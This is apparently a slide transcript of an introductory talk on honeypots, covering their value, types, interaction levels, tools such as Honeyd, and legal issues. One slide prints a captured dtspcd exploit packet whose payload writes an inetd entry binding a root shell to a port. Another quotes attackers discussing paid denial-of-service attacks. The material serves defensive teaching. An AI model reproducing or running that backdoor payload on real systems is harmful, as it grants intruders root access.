Download presentation
Presentation is loading. Please wait.
1
Honeypots
2
Your Speaker Lance Spitzner
Senior Security Architect, Sun Microsystems Founder of the Honeynet Project Author of Honeypots: Tracking Hackers Co-author of Know Your Enemy Moderator of maillist Former ‘tread head’.
3
Purpose To introduce you to honeypots, what they are, how they work, their value.
4
Problem Variety of misconceptions about honeypots, everyone has their own definition. This confusion has caused lack of understanding, and adoption.
5
Honeypot Timeline 1990/1991 The Cuckoo’s Egg and Evening with Berferd
Deception Toolkit CyberCop Sting NetFacade (and Snort) BackOfficer Friendly Formation of the Honeynet Project Worms captured dtspcd exploit capture
6
Definition Any security resource who’s value lies in being probed, attacked, or compromised
7
How honeypots work Simple concept
A resource that expects no data, so any traffic to or from it is most likely unauthorized activity
8
Not limited to specific purpose
Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture. Their value, and the problems they help solve, depend on how build, deploy, and you use them.
9
Types Production (Law Enforcment) Research (Counter-Intelligence)
Marty’s idea
10
Value What is the value of honeypots?
One of the greatest areas of confusion concerning honeypot technologies.
11
Advantages Based on how honeypots conceptually work, they have several advantages. Reduce False Positives and False Negatives Data Value Resources Simplicity
12
Disadvantages Based on the concept of honeypots, they also have disadvantages: Narrow Field of View Fingerprinting Risk
13
Production Prevention Detection Response
14
Prevention Keeping the burglar out of your house.
Honeypots, in general are not effective prevention mechanisms. Deception, Deterence, Decoys, are phsychological weapons. They do NOT work against automated attacks: worms auto-rooters mass-rooters
15
Detection Detecting the burglar when he breaks in.
Honeypots excel at this capability, due to their advantages.
16
Response Honeypots can be used to help respond to an incident.
Can easily be pulled offline (unlike production systems. Little to no data pollution.
17
Research Honeypots Early Warning and Prediction
Discover new Tools and Tactics Understand Motives, Behavior, and Organization Develop Analysis and Forensic Skills
18
Early Warning and Prediction
19
Tools 01/08-08:46: :3592 -> :6112 TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32 TCP Options (3) => NOP NOP TS: e00 C 80 1C C C 80 1C C C C D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#.. B 91 D F E 2F 6B /bin/ksh D F E c echo "in C 6F 63 6B D 20 greslock stream E 6F F 6F tcp nowait root 2F E 2F D E 2F /bin/sh sh -i">/ 74 6D 70 2F 78 3B 2F F E 2F tmp/x;/usr/sbin/ 69 6E D F 74 6D 70 2F 78 3B inetd -s /tmp/x; 73 6C B 2F E 2F 72 6D sleep 10;/bin/rm 20 2D F 74 6D 70 2F f /tmp/x AAAAA AAAAAAAAAAAAAAAA
20
Tactics
21
Motives and Behavior J4ck: why don't you start charging for packet
attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time" J1LL: it was illegal last I checked. J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting.
22
Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk.
23
Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.
24
Low Interaction Provide Emulated Services
No operating system for attacker to access. Information limited to transactional information and attackers activities with emulated services.
25
High Interaction Provide Actual Operating Systems
Learn extensive amounts of information. Extensive risk.
26
Honeypots BackOfficer Friendly SPECTER Honeyd ManTrap Honeynets
SPECTER Honeyd ManTrap Honeynets Low Interaction High Interaction
27
BackOfficer Friendly
28
Specter
29
Honeyd create default set default personality "FreeBSD 2.2.1-STABLE"
set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set template uptime bind windows
30
ManTrap
31
Honeynets
32
Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.
33
Legal Issues Privacy Entrapment Liability
34
Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section General Number: (202) Specific Contact: Richard Salgado Direct Telephone (202) E-Mai: Any military or federal government organization can get legal advice for Honeynets from the Department of Justice. Richard Solgado of the DoJ has been researching Honeynet technologies and is the point of contact for any legal issues. For non government and military organizations, you are highly encouraged to refer to your local legal counsel for legal issues involving Honeynet technologies.
35
Summary Honeypos are a highly flexible security tool that can be used in a variety of different deployments.
36
Resources Honeypots: Tracking Hackers
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.